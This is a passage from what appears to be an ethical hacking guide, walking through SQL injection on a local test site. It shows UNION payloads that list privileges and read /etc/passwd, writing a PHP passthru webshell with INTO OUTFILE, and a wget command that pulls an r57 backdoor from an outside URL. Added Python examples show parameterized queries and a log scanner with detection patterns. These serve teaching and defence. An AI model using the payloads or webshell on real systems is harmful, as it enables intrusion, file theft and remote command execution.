Ethical Hacking and Penetration Testing Guide



Syntax
http://localhost/index.php?support=yes' and 1=0 UNION SELECT 1,group_concat(privilege_type),3,4,5,6 FROM information_schema.schema_privileges--
The database returns all the privileges that the current user has.
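The injection above works because the value of the support parameter is concatenated into the SQL text, so the closing quote ends the string literal and everything after it is parsed as SQL. As an added example (not code from the book), here is that vulnerable lookup beside its parameterized form, demonstrated with Python's sqlite3 module on a constructed six-column table so it runs offline; the table, its columns, the ticket rows and the function names are assumptions made for the example.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    # Constructed sample schema: six columns, matching the 1,2,3,4,5,6
    # column layout of the UNION payloads shown on this page.
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE tickets (id INTEGER, subject TEXT, body TEXT, "
        "owner TEXT, opened TEXT, support TEXT)"
    )
    conn.executemany(
        "INSERT INTO tickets VALUES (?, ?, ?, ?, ?, ?)",
        [
            (1, "Login issue", "Cannot log in", "alice", "2023-08-07", "yes"),
            (2, "Feature idea", "Dark mode please", "bob", "2023-08-07", "no"),
        ],
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, support: str) -> list:
    # The request parameter is spliced straight into the SQL text. A quote in
    # the input closes the literal and the remainder is executed as SQL.
    sql = (
        "SELECT id, subject, body, owner, opened, support FROM tickets "
        f"WHERE support = '{support}'"
    )
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn: sqlite3.Connection, support: str) -> list:
    # Same lookup with a bound parameter: the value is passed to the engine
    # separately from the statement, so it can only ever be compared as data.
    sql = (
        "SELECT id, subject, body, owner, opened, support FROM tickets "
        "WHERE support = ?"
    )
    return conn.execute(sql, (support,)).fetchall()


# The payload shape used on this page: close the quote, suppress the original
# rows with "and 1=0", and append a UNION with a matching column count.
# sqlite_version() stands in for the MySQL functions the page calls.
PAYLOAD = "yes' and 1=0 UNION SELECT 1,sqlite_version(),3,4,5,6--"


def demo() -> dict:
    # Run both lookups with a normal value and with the payload.
    conn = make_db()
    return {
        "normal_vulnerable": lookup_vulnerable(conn, "yes"),
        "normal_parameterized": lookup_parameterized(conn, "yes"),
        "payload_vulnerable": lookup_vulnerable(conn, PAYLOAD),
        "payload_parameterized": lookup_parameterized(conn, PAYLOAD),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name}: {rows}")
```

With the concatenated query the payload returns one attacker-chosen row (the version string sits where a LOAD_FILE() or group_concat() result would sit in MySQL); with the bound parameter the same input simply matches no ticket. The parameterized form is the fix for every query on this page, since none of the later payloads can begin without first breaking out of the string literal.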
Reading Files
To read a file on the operating system, we will use load_file(). Let's try reading the /etc/passwd file.
http://localhost/index.php?support=yes' and 1=0 UNION SELECT 1,LOAD_FILE('/etc/passwd'),3,4,5,6 FROM information_schema.schemata--
We have successfully managed to read the /etc/passwd file. In some cases, where an error is returned while reading a particular file, try converting the file name to its hex equivalent (0x2f6574632f706173737764 is the hex encoding of the string /etc/passwd). The query now becomes
Syntax
http://localhost/index.php?support=yes' and 1=0 UNION SELECT 1,LOAD_FILE(0x2f6574632f706173737764),3,4,5,6 FROM information_schema.schemata--
Writing Files
Next, we can upload a simple PHP backdoor that allows us to execute commands on the system, for which we need to find a writable directory. We will upload our backdoor to the /var/www directory, which is our current directory and happens to be writable. You can determine the current directory by executing the datadir() function.
Our simple one-line backdoor is as follows:

This will help us execute system commands via the GET parameter cmd. The passthru() function in PHP allows us to execute arbitrary commands on the system. To write files into the directory, we will use the INTO OUTFILE clause and specify the target path.
Syntax
http://localhost/index.php?support=yes' and 1=0 UNION SELECT 1,"<?php passthru($_GET['cmd']); ?>",3,4,5,6 INTO OUTFILE '/var/www/shell.php'--
The query is simple: it writes the PHP code placed in the second column to the file shell.php.
If everything goes fine, our backdoor has been uploaded and we can execute commands via the cmd parameter. Let's try reading /etc/passwd.
Syntax
http://localhost/shell.php?cmd=cat /etc/passwd
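Every request in this section leaves a trace in the web server's access log: the UNION SELECT against information_schema, the LOAD_FILE() call with its hex-encoded file name, the INTO OUTFILE write, and the later requests to shell.php?cmd=. As an added example (not code from the book), this Python scanner URL-decodes each logged request, matches those patterns, and decodes 0x… hex literals back to the strings they hide, so the hex trick from the Reading Files section does not evade a log review. The Apache-style log lines are constructed to replay this section's requests; the signature list, field names and function names are assumptions made for the example.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (not from the book) replaying this section's
# requests, URL-encoded the way a browser would send them. The INTO OUTFILE
# line carries a placeholder string 'x' in place of the PHP payload.
SAMPLE_LOG = """\
10.0.0.5 - - [07/Aug/2023:10:00:01 +0000] "GET /index.php?support=yes HTTP/1.1" 200 512
10.0.0.9 - - [07/Aug/2023:10:00:07 +0000] "GET /index.php?support=yes%27%20and%201%3D0%20UNION%20SELECT%201%2Cgroup_concat%28privilege_type%29%2C3%2C4%2C5%2C6%20FROM%20information_schema.schema_privileges-- HTTP/1.1" 200 731
10.0.0.9 - - [07/Aug/2023:10:00:15 +0000] "GET /index.php?support=yes%27%20and%201%3D0%20UNION%20SELECT%201%2CLOAD_FILE%280x2f6574632f706173737764%29%2C3%2C4%2C5%2C6%20FROM%20information_schema.schemata-- HTTP/1.1" 200 2210
10.0.0.9 - - [07/Aug/2023:10:00:31 +0000] "GET /index.php?support=yes%27%20and%201%3D0%20UNION%20SELECT%201%2C%27x%27%2C3%2C4%2C5%2C6%20INTO%20OUTFILE%20%27/var/www/shell.php%27%20-- HTTP/1.1" 200 0
10.0.0.9 - - [07/Aug/2023:10:00:40 +0000] "GET /shell.php?cmd=cat+/etc/passwd HTTP/1.1" 200 1843
"""

# Pulls the request target out of a combined-format log line.
REQUEST = re.compile(r'"(?:GET|POST|PUT|HEAD) (\S+) HTTP/')

# Signatures for the techniques used on this page, applied to the
# URL-decoded, lower-cased request so encoding and case do not hide them.
SIGNATURES = [
    ("union_select", re.compile(r"\bunion\b\s+(?:all\s+)?select\b")),
    ("load_file", re.compile(r"\bload_file\s*\(")),
    ("into_outfile", re.compile(r"\binto\s+(?:out|dump)file\b")),
    ("info_schema", re.compile(r"\binformation_schema\.")),
    # A .php script taking a cmd= parameter is the shape of the dropped shell.
    ("webshell_param", re.compile(r"\.php\?(?:[^ ]*&)?cmd=")),
]

# MySQL hex string literals such as 0x2f6574632f706173737764.
HEX_LITERAL = re.compile(r"0x((?:[0-9a-f]{2})+)")


def analyze_request(raw_request: str) -> dict:
    """Decode one request target and report which signatures it matches."""
    decoded = unquote_plus(raw_request)
    lowered = decoded.lower()
    hits = [name for name, rx in SIGNATURES if rx.search(lowered)]
    # Turn hex literals back into text so the reviewer sees the real file name.
    hex_decoded = [
        bytes.fromhex(h).decode("latin-1") for h in HEX_LITERAL.findall(lowered)
    ]
    return {"request": decoded, "hits": hits, "hex_decoded": hex_decoded}


def scan_log(text: str) -> list:
    """Return one finding per log line that matches at least one signature."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        match = REQUEST.search(line)
        if not match:
            continue
        result = analyze_request(match.group(1))
        if result["hits"]:
            result["line"] = lineno
            findings.append(result)
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(f"line {finding['line']}: {finding['hits']} {finding['hex_decoded']}")
        print(f"  {finding['request']}")
```

A 200 response with a non-empty body on the LOAD_FILE() request, followed by a request to a .php file that did not exist before, is the sequence worth alerting on; the hex decoding is what tells the reviewer that the file read was /etc/passwd rather than an opaque literal.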
Here, we can execute our commands on the target system, which is Linux based, so we would try to read Linux-specific files. If it were running a Windows OS, we would have tried to read files such as "boot.ini" or "winboot.ini".
Since we are now able to execute commands on the system, we will now try to download a more powerful backdoor from an external URL and write it onto the system. We can use wget to download a file from an external location; its -O parameter writes the downloaded file to the given path.
Syntax
wget "http://target.com/r57.txt" -O r57.php
Now, we can directly access our r57.php shell via the following URL:
http://localhost/r57.php


Web Hacking